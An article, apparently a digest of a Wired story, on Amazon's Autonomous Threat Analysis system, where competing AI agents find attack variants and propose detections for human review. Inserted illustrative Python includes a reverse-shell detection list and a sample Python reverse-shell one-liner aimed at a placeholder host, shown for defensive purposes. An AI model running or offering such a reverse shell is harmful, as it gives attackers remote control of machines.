Amazon Deploys Specialized AI Agents to Dig Deep for System Vulnerabilities

Source: https://www.wired.com/story/amazon-autonomous-threat-analysis/
Summary:
[Amazon unveils ATA, an AI security defense system, to counter cyber threats at "machine speed"]
As generative AI accelerates software iteration, cyberattack techniques are advancing in step, putting unprecedented pressure on security teams at tech companies. On Monday, Amazon disclosed for the first time its internally developed Autonomous Threat Analysis (ATA) system, which runs simulated offense-versus-defense exercises to proactively patch vulnerabilities before hackers can exploit them.
ATA was born out of an internal Amazon hackathon in August 2024. Its innovation lies in pitting multiple groups of specialized AI agents against one another: red-team agents simulate attack techniques while blue-team agents focus on building defenses. Amazon chief security officer Steve Schmidt says traditional security testing suffers from limited coverage and lagging response, whereas ATA operates in high-fidelity test environments that generate real, verifiable log data, ruling out AI "hallucinations" at the architectural level.
In practice, ATA has analyzed the Python "reverse shell" technique favored by hackers, discovering new attack variants within hours and generating detections that proved 100 percent effective. Notably, the system keeps a human in the loop: every security control must be confirmed by a security engineer before it is deployed.
"AI handles the groundwork so the team can focus on real threats," Schmidt stresses. ATA is not meant to replace human experts; rather, it frees engineers from repetitive work so their expertise can go to the most critical, complex offense-and-defense scenarios. Amazon's next step is reportedly to apply ATA to real-time incident response to protect its vast digital ecosystem.
English source:
As generative AI pushes the speed of software development, it is also enhancing the ability of digital attackers to carry out financially motivated or state-backed hacks. This means that security teams at tech companies have more code than ever to review while dealing with even more pressure from bad actors. On Monday, Amazon will publish details for the first time of an internal system known as Autonomous Threat Analysis (ATA), which the company has been using to help its security teams proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and then develop remediations and detection capabilities to plug holes before attackers find them.
ATA was born out of an internal Amazon hackathon in August 2024, and security team members say that it has grown into a crucial tool since then. The key concept underlying ATA is that it isn't a single AI agent developed to comprehensively conduct security testing and threat analysis. Instead, Amazon developed multiple specialized AI agents that compete against each other in two teams to rapidly investigate real attack techniques and different ways they could be used against Amazon's systems—and then propose security controls for human review.
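To make that division of labor concrete, here is a minimal, hypothetical Python sketch of such a red-team/blue-team loop; the agent classes, the canned variant generation, and the human review queue are illustrative assumptions, not Amazon's actual ATA implementation.

```python
# Hypothetical sketch of an ATA-style red-team/blue-team loop (illustrative only,
# not Amazon's actual implementation). Red agents probe a sandboxed test
# environment for variants of a known technique, blue agents propose detections,
# and every proposed control is queued for human review before anything changes.
from dataclasses import dataclass


@dataclass
class AttackFinding:
    technique: str      # e.g. "python reverse shell, variant 2"
    evidence_log: str   # log line captured while the command ran in the sandbox


@dataclass
class SecurityControl:
    detects: str            # technique the control claims to cover
    rule: str               # detection rule proposed by a blue-team agent
    approved: bool = False  # flipped to True only after a human signs off


class RedTeamAgent:
    """Explores variations of a base technique inside the test environment."""

    def explore(self, base_technique: str) -> list:
        variants = [f"{base_technique}, variant {i}" for i in range(1, 4)]
        return [AttackFinding(v, evidence_log=f"[ts] executed: {v}") for v in variants]


class BlueTeamAgent:
    """Proposes a detection for each red-team finding."""

    def propose(self, finding: AttackFinding) -> SecurityControl:
        return SecurityControl(
            detects=finding.technique,
            rule=f"alert when telemetry matches '{finding.technique}'",
        )


def run_round(base_technique: str) -> list:
    """One adversarial round: red explores, blue proposes, humans review later."""
    red, blue = RedTeamAgent(), BlueTeamAgent()
    review_queue = [blue.propose(f) for f in red.explore(base_technique)]
    return review_queue  # nothing is deployed until a person sets approved=True


if __name__ == "__main__":
    for control in run_round("python reverse shell"):
        print(control)
```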
“The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape,” Steve Schmidt, Amazon's chief security officer, tells WIRED. “Limited coverage means you can’t get through all of the software or you can’t get to all of the applications because you just don’t have enough humans. And then it’s great to do an analysis of a set of software, but if you don’t keep the detection systems themselves up to date with the changes in the threat landscape, you’re missing half of the picture.”
As part of scaling its use of ATA, Amazon developed special “high-fidelity” testing environments that are deeply realistic reflections of Amazon's production systems, so ATA can both ingest and produce real telemetry for analysis.
The company's security teams also made a point to design ATA so every technique it employs, and detection capability it produces, is validated with real, automatic testing and system data. Red team agents that are working on finding attacks that could be used against Amazon's systems execute actual commands in ATA's special test environments that produce verifiable logs. Blue team, or defense-focused agents, use real telemetry to confirm whether the protections they are proposing are effective. And anytime an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.
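As a rough illustration of that evidence-gated design, the sketch below accepts an agent's claim only when a matching, timestamped log entry exists in the captured telemetry; the log fields and the verify_claim helper are assumptions made for illustration, not ATA's actual interfaces.

```python
# Hypothetical sketch of the evidence requirement (not ATA's real interface):
# an agent's claim is accepted only when timestamped telemetry from the test
# environment actually shows the claimed technique being executed.
from datetime import datetime, timezone


def verify_claim(claimed_technique: str, telemetry: list) -> bool:
    """Accept a claim only if a parseable, timestamped log entry backs it up."""
    for entry in telemetry:
        if entry.get("technique") == claimed_technique and "timestamp" in entry:
            try:
                datetime.fromisoformat(entry["timestamp"])  # auditability check
                return True
            except ValueError:
                continue
    return False


if __name__ == "__main__":
    logs = [{
        "technique": "python reverse shell, variant 2",
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "command": "<command executed in the sandbox>",
    }]
    print(verify_claim("python reverse shell, variant 2", logs))  # True
    print(verify_claim("ssh tunnel pivot", logs))                 # False: no evidence
```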
This verifiability reduces false positives, Schmidt says, and acts as “hallucination management.” Because the system is built to demand certain standards of observable evidence, Schmidt claims that “hallucinations are architecturally impossible.”
The fact that ATA's specialized agents work together in teams—each lending its expertise toward a larger goal—mimics the way that humans collaborate in security testing and defense development. The difference that AI provides, says Amazon security engineer Michael Moran, is the power to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that is prohibitively time consuming for humans alone.
“I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding and a lot of the base stuff is taken care of for me” in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. “It makes my job way more fun but it also enables everything to run at machine speed.”
Schmidt notes, too, that ATA has already been extremely effective at looking at particular attack capabilities and generating defenses. In one example, the system focused on Python “reverse shell” techniques, used by hackers to manipulate target devices into initiating a remote connection to the attacker's computer. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon's defense systems that proved to be 100 percent effective.
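For context, a heavily simplified detection heuristic for Python reverse-shell activity might look something like the following sketch, which flags process command lines that combine several classic indicators (socket creation, descriptor duplication, shell spawning); the indicator list and the suspicious_process helper are illustrative assumptions, not the detections ATA actually produced.

```python
# Heavily simplified, hypothetical detection heuristic for Python reverse-shell
# activity (illustrative only; not one of the detections ATA generated).
INDICATORS = [
    "socket.socket(",              # opening an outbound network connection
    ".connect((",                  # connecting back to a remote host
    "os.dup2(",                    # wiring the socket to stdin/stdout/stderr
    "pty.spawn(",                  # spawning an interactive shell over that socket
    'subprocess.call(["/bin/sh"',  # alternative shell-spawn pattern
]


def suspicious_process(cmdline: str, threshold: int = 2) -> bool:
    """Flag a process command line that combines several reverse-shell indicators."""
    hits = sum(1 for marker in INDICATORS if marker in cmdline)
    return hits >= threshold


if __name__ == "__main__":
    benign = "python3 manage.py runserver"
    shady = ("python3 -c \"import socket,os,pty; s=socket.socket(); "
             "s.connect((HOST, PORT)); os.dup2(s.fileno(), 0); pty.spawn('/bin/sh')\"")
    print(suspicious_process(benign))  # False
    print(suspicious_process(shady))   # True
```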
ATA does its work autonomously, but it uses the “human in the loop” methodology that requires input from a real person before actually implementing changes to Amazon's security systems. And Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that for the massive quantity of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.
The next step, he says, is to start using ATA in real-time incident response for faster identification and remediation in actual attacks on Amazon's massive systems.
“AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats,” Schmidt says. “I think the part that’s most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most.”